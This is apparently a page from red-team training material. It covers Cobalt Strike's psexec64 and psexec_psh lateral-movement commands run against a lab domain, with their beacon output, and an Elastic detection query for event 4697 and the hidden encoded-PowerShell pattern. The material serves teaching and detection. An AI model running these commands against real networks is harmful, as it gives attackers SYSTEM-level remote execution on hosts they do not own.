PsExec
The psexec
/ psexec64
commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM.
beacon> jump psexec64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (\\web\ADMIN$\768870c.exe)
Started service 768870c on web.dev.cyberbotic.io
[+] established link to child beacon: 10.10.122.30
\

\
A reliable way of searching for PsExec is by looking for 4697 service created events. These are often quite rare, unless a service comes with a software installation or something similar. Cobalt Strike generates a random 7-character alphanumeric string which it uses for both the service name and binary filename. When setting the binPath for the service, it uses a UNC path to the ADMIN$ share.
event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
\

\
psexec_psh
doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). The pattern it uses by default is %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
.
beacon> jump psexec_psh web smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (PSH)
Started service bd119dd on web
[+] established link to child beacon: 10.10.122.30
\

Last updated